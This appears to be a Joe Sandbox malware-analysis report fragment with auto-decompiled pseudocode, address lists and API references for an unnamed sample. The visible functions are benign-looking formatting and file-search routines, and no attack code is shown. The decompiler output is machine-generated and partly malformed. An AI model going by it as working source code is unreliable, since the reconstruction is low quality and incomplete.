0x0101a145
0x0101a149
0x0101a14d
0x0101a166
0x0101a171
0x0101a17d
0x0101a173
0x0101a173
0x0101a173
0x0101a183
0x0101a18f
0x0101a195
0x0101a195
0x0101a197
0x0101a1a3
0x0101a1a9
0x0101a1ab
0x0101a1b7
0x0101a1bd
0x0101a1bf
0x0101a1cb
0x0101a1d1
0x0101a1d5
0x0101a1d7
0x0101a1d7
0x0101a1d9
0x00000000
0x0101a1d9
0x0101a06e
0x0101a07a
0x0101a080
0x0101a080
0x0101a02a
0x0101a036
0x0101a03c
0x0101a03e
0x0101a03e
0x0101a000
0x0101a006
0x00000000
0x0101a006
0x01019fcd
0x01019f69
0x01019f6d
0x01019f71
0x00000000

APIs

Part of subcall function 01019DF1: GetDC.USER32(00000000), ref: 01019DF5
Part of subcall function 01019DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 01019E00
Part of subcall function 01019DF1: ReleaseDC.USER32(00000000,00000000), ref: 01019E0B

GetObjectW.GDI32(?,00000018,?), ref: 01019F8D

Part of subcall function 0101A1E5: GetDC.USER32(00000000), ref: 0101A1EE
Part of subcall function 0101A1E5: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,01019F7A,?,?,?), ref: 0101A21D
Part of subcall function 0101A1E5: ReleaseDC.USER32(00000000,?), ref: 0101A2B5

Strings

(, xrefs: 0101A0A3

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: d783db043b249ca43660931d0b0b49c7dafe3c049ec68c464966a2a083efe463
Instruction ID: 854860d218adccdb0d8b5ca46243a5757ecd52ff9e2fc980ea001f9bfc7f52a0
Opcode Fuzzy Hash: d783db043b249ca43660931d0b0b49c7dafe3c049ec68c464966a2a083efe463
Instruction Fuzzy Hash: 2E81F371608244EFD714DF68D884A2ABBE9FFC8704F00491DF98AD7264DB7AAD05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01010E37, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E01010E37(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x72;
				if(_t47 > 0) {
					__eflags = _t26 - 0x80;
					if(_t26 == 0x80) {
						E0101CD24();
						_t28 = E0100DDD1(_t41, 0x96);
						return E01019F35( *0x104844c, E0100DDD1(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E0100DDD1(_t41));
						_push( *_t44);
						L19:
						_t32 = E0101AE88();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M010110FF))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E0100DDD1(__ecx, 0xc8) =  &_v516;
										__eax = E0100400A( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E0101AE88( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E0100DDD1(_t41);
							L7:
							_push(0);
							L8:
							return E0101AE88();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M010110A7))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E0101A5F8();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E0100DDD1(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E0100DDD1(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E0100DDD1(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}

0x01010e37
0x01010e41
0x01010e43
0x01010e46
0x01010e49
0x01011070
0x01011075
0x01011077
0x01011083
0x00000000
0x0101109a
0x01010e4f
0x01010e4f
0x01011066
0x01010f93
0x01010f98
0x01010f99
0x01010ed6
0x01010ed6
0x01010e9f
0x00000000
0x01010e9f
0x01010e55
0x01010e58
0x01010f58
0x01010f5b
0x0101101b
0x0101101b
0x0101101e
0x0101105c
0x00000000
0x0101105c
0x01011020
0x01011020
0x01011023
0x01011055
0x00000000
0x01011055
0x01011025
0x01011025
0x01011028
0x01011048
0x0101104b
0x00000000
0x0101104b
0x0101102a
0x0101102a
0x0101102d
0x0101103e
0x00000000
0x0101103e
0x0101102f
0x0101102f
0x01011032
0x01011034
0x00000000
0x01011034
0x01010f61
0x01010f61
0x01011014
0x00000000
0x01011014
0x01010f67
0x01010f6a
0x01010f6d
0x01010f73
0x00000000
0x01010f7a
0x00000000
0x00000000
0x01010f84
0x00000000
0x00000000
0x01010f8e
0x00000000
0x00000000
0x01010fa0
0x00000000
0x00000000
0x01010fa4
0x00000000
0x00000000
0x01010fa8
0x01010fab
0x00000000
0x00000000
0x01010fb2
0x00000000
0x00000000
0x01010fb9
0x00000000
0x00000000
0x01010fc0
0x01010fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x01010fcd
0x01010fd0
0x00000000
0x00000000
0x01010fe5
0x01010ff1
0x01010ff6
0x01010ff9
0x01010fff
0x00000000
0x00000000
0x01010f73
0x01010f6d
0x01010e5e
0x01010e5e
0x01010f4f
0x01010f51
0x01010ef3
0x01010ef3
0x01010e7b
0x01010e7b
0x01010e7d
0x00000000
0x01010e82
0x01010e67
0x01010e6d
0x00000000
0x01010e8a
0x01010e8c
0x01010e91
0x00000000
0x00000000
0x01010e74
0x01010e76
0x00000000
0x00000000
0x01010e98
0x01010e9a
0x00000000
0x00000000
0x01010ea5
0x01010ea8
0x00000000
0x00000000
0x01010eb4
0x01010eb7
0x00000000
0x00000000
0x01010ebb
0x01010ebe
0x00000000
0x00000000
0x01010ec2
0x01010ec5
0x00000000
0x00000000
0x01010ecc
0x01010ece
0x01010ed3
0x01010ed4
0x00000000
0x00000000
0x01010ede
0x01010ee1
0x00000000
0x00000000
0x01010ee5
0x01010ee8
0x00000000
0x00000000
0x01010eec
0x01010eee
0x00000000
0x00000000
0x01010efb
0x01010efd
0x00000000
0x00000000
0x01010f04
0x01010f07
0x00000000
0x00000000
0x01010f0e
0x01010f11
0x00000000
0x00000000
0x00000000
0x00000000
0x01010f18
0x01010f1b
0x01010f23
0x00000000
0x00000000
0x01010f38
0x01010f3b
0x00000000
0x00000000
0x01010f42
0x01010f45
0x01010eaa
0x01010eaf
0x01010eb0
0x00000000
0x00000000
0x01010e6d
0x01010e67
0x01010e58
0x010110a3
0x010110a3

APIs

_swprintf.LIBCMT ref: 01010FF1

Strings

%ls, xrefs: 01010E76, 01010E8C
%s: %s, xrefs: 01011000

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 72b0194d5601dfb5aaa63670880cc8b61ce61a995438cdced3e1a4285dbc5aa2
Instruction ID: 5bc06170b941a0cf3b801230d0b8de9e8678ee161db7a948ffe9c6e22005b746
Opcode Fuzzy Hash: 72b0194d5601dfb5aaa63670880cc8b61ce61a995438cdced3e1a4285dbc5aa2
Instruction Fuzzy Hash: 7451B53178C741F9FA262AE4DD42F7A7AD6EB14B04F00850AF3DB698DDC6EE51908712

Uniqueness

Uniqueness Score: -1.00%

Function 0102A918, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0102A918(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E01027956(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0102E8A2(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E01028849();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E010285A9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0102E8A2(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0102ACE7(_a12, _t193, __eflags, _t213);
													E010284DE(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0102E8A2(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E01028849();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x103e668; // 0x7ecdc17e
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E0102E8F0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E0101F350(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E01025A90(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0102A900);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0101EC4A(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E010284DE(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E0102E8B0( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0102ACC2( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E0102895A();
					_t219 = 0x16;
					 *_t148 = _t219;
					E01028839();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x0102a91d
0x0102a920
0x0102a926
0x0102a93e
0x0102a941
0x0102a945
0x0102a947
0x0102a949
0x0102a94b
0x0102a94e
0x0102a951
0x0102a954
0x0102a956
0x0102a9ae
0x0102a9ae
0x0102a9b4
0x0102a9b6
0x0102a9c1
0x0102a9c5
0x0102a9c7
0x0102a9ca
0x0102a9ce
0x0102a9ce
0x0102a9d0
0x0102a9d2
0x0102a9d4
0x0102a9d6
0x0102a9d6
0x0102a9d8
0x0102a9db
0x0102a9de
0x0102a9de
0x0102a9e0
0x0102a9e1
0x0102a9e1
0x0102a9ec
0x0102a9ee
0x0102a9f1
0x0102a9f2
0x0102a9f5
0x0102a9f5
0x0102a9f9
0x0102a9fc
0x0102a9ff
0x0102a9ff
0x0102aa0d
0x0102aa0f
0x0102aa12
0x0102aa14
0x0102aa1e
0x0102aa21
0x0102aa24
0x0102aa26
0x0102aa29
0x0102aa2b
0x0102aa7b
0x0102aa7e
0x0102aa7e
0x0102aa80
0x00000000
0x0102aa2d
0x0102aa2f
0x0102aa2f
0x0102aa31
0x0102aa34
0x0102aa34
0x0102aa39
0x0102aa3c
0x0102aa3c
0x0102aa3e
0x0102aa3f
0x0102aa3f
0x0102aa43
0x0102aa46
0x0102aa46
0x0102aa49
0x0102aa4c
0x0102aa59
0x0102aa5e
0x0102aa61
0x0102aa63
0x0102aa9d
0x0102aa9e
0x0102aa9f
0x0102aaa0
0x0102aaa1
0x0102aaa2
0x0102aaa7
0x0102aaab
0x0102aaad
0x0102aaae
0x0102aab1
0x0102aab1
0x0102aab4
0x0102aab4
0x0102aab6
0x0102aab7
0x0102aab7
0x0102aac0
0x0102aac1
0x0102aac4
0x0102aac7
0x0102aaca
0x0102aacc
0x0102aad3
0x0102aad5
0x0102aad8
0x0102aae2
0x0102aae5
0x0102aae6
0x0102aae8
0x0102aafc
0x0102aafc
0x0102aaff
0x0102ab09
0x0102ab0e
0x0102ab11
0x0102ab13
0x00000000
0x0102ab15
0x0102ab19
0x0102ab22
0x0102ab28
0x00000000
0x0102ab2b
0x0102aaea
0x0102aaea
0x0102aaf0
0x0102aaf5
0x0102aaf8
0x0102aafa
0x0102ab31
0x0102ab33
0x0102ab34
0x0102ab35
0x0102ab36
0x0102ab37
0x0102ab38
0x0102ab3d
0x0102ab40
0x0102ab41
0x0102ab43
0x0102ab49
0x0102ab50
0x0102ab53
0x0102ab56
0x0102ab57
0x0102ab5a
0x0102ab5b
0x0102ab5e
0x0102ab5f
0x0102ab80
0x0102ab80
0x0102ab82
0x00000000
0x00000000
0x0102ab67
0x0102ab69
0x0102ab6b
0x0102ab6d
0x0102ab6f
0x0102ab71
0x0102ab73
0x0102ab7e
0x00000000
0x0102ab7e
0x0102ab73
0x0102ab6f
0x00000000
0x0102ab6b
0x0102ab84
0x0102ab86
0x0102ab89
0x0102aba2
0x0102aba2
0x0102aba4
0x0102aba7
0x0102abb7
0x0102abb9
0x0102abb9
0x0102aba9
0x0102aba9
0x0102abac
0x00000000
0x0102abae
0x0102abae
0x0102abb1
0x00000000
0x0102abb3
0x0102abb3
0x0102abb3
0x0102abb1
0x0102abac
0x0102abc7
0x0102abcb
0x0102abd9
0x0102abde
0x0102abf3
0x0102abf5
0x0102abfb
0x0102abfe
0x0102ac30
0x0102ac30
0x0102ac35
0x0102ac3b
0x0102ac3b
0x0102ac42
0x0102ac5c
0x0102ac5c
0x0102ac5d
0x0102ac63
0x0102ac69
0x0102ac6a
0x0102ac6b
0x0102ac70
0x0102ac73
0x0102ac75
0x00000000
0x00000000
0x00000000
0x00000000
0x0102ac44
0x0102ac44
0x0102ac4a
0x0102ac4c
0x00000000
0x0102ac4e
0x0102ac4e
0x0102ac51
0x00000000
0x0102ac53
0x0102ac53
0x0102ac5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0102ac5a
0x0102ac51
0x0102ac4c
0x00000000
0x0102ac77
0x0102ac7f
0x0102ac85
0x0102ac87
0x0102ac87
0x0102ac8f
0x0102ac94
0x0102ac9c
0x0102ac9f
0x0102aca1
0x0102acb5
0x0102acba
0x0102ac00
0x0102ac00
0x0102ac01
0x0102ac02
0x0102ac03
0x0102ac04
0x0102ac0c
0x0102ac0c
0x0102ac0c
0x0102ac0e
0x0102ac11
0x0102ac14
0x0102ac14
0x0102ab8b
0x0102ab8e
0x0102ab90
0x00000000
0x0102ab92
0x0102ab92
0x0102ab95
0x0102ab96
0x0102ab97
0x0102ab98
0x0102ab9d
0x0102ab90
0x0102ac1c
0x0102ac21
0x0102ac2c
0x00000000
0x00000000
0x00000000
0x0102aafa
0x0102aace
0x0102aad0
0x0102ab2c
0x0102ab30
0x0102ab30
0x00000000
0x00000000
0x00000000
0x00000000
0x0102aa65
0x0102aa68
0x0102aa6b
0x0102aa6e
0x0102aa71
0x0102aa74
0x0102aa77
0x0102aa77
0x00000000
0x0102aa34
0x0102aa16
0x0102aa16
0x0102aa82
0x0102aa84
0x00000000
0x0102aa89
0x0102a958
0x0102a958
0x0102a95b
0x0102a964
0x0102a967
0x0102a96e
0x0102a970
0x0102a989
0x0102a98a
0x0102a98b
0x0102a98d
0x0102a992
0x0102a972
0x0102a972
0x0102a975
0x0102a976
0x0102a978
0x0102a97a
0x0102a97c
0x0102a981
0x0102a981
0x0102a995
0x0102a997
0x0102a999
0x00000000
0x00000000
0x0102a99f
0x0102a9a2
0x0102a9a4
0x0102a9a6
0x00000000
0x0102a9a8
0x0102a9a8
0x0102a9ab
0x00000000
0x0102a9ab
0x00000000
0x0102a9a6
0x0102aa8a
0x0102aa8d
0x0102aa92
0x00000000
0x0102aa95
0x0102a928
0x0102a928
0x0102a92f
0x0102a930
0x0102a932
0x0102a937
0x0102aa96
0x0102aa9a
0x0102aa9a
0x00000000

APIs

_free.LIBCMT ref: 0102AA84

Part of subcall function 01028849: IsProcessorFeaturePresent.KERNEL32(00000017,01028838,00000050,01033958,?,0100CFE0,00000004,01040EE8,?,?,01028845,00000000,00000000,00000000,00000000,00000000), ref: 0102884B
Part of subcall function 01028849: GetCurrentProcess.KERNEL32(C0000417,01033958,00000050,01040EE8), ref: 0102886D
Part of subcall function 01028849: TerminateProcess.KERNEL32(00000000), ref: 01028874

Strings

., xrefs: 0102AC3B
*?, xrefs: 0102A95B

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
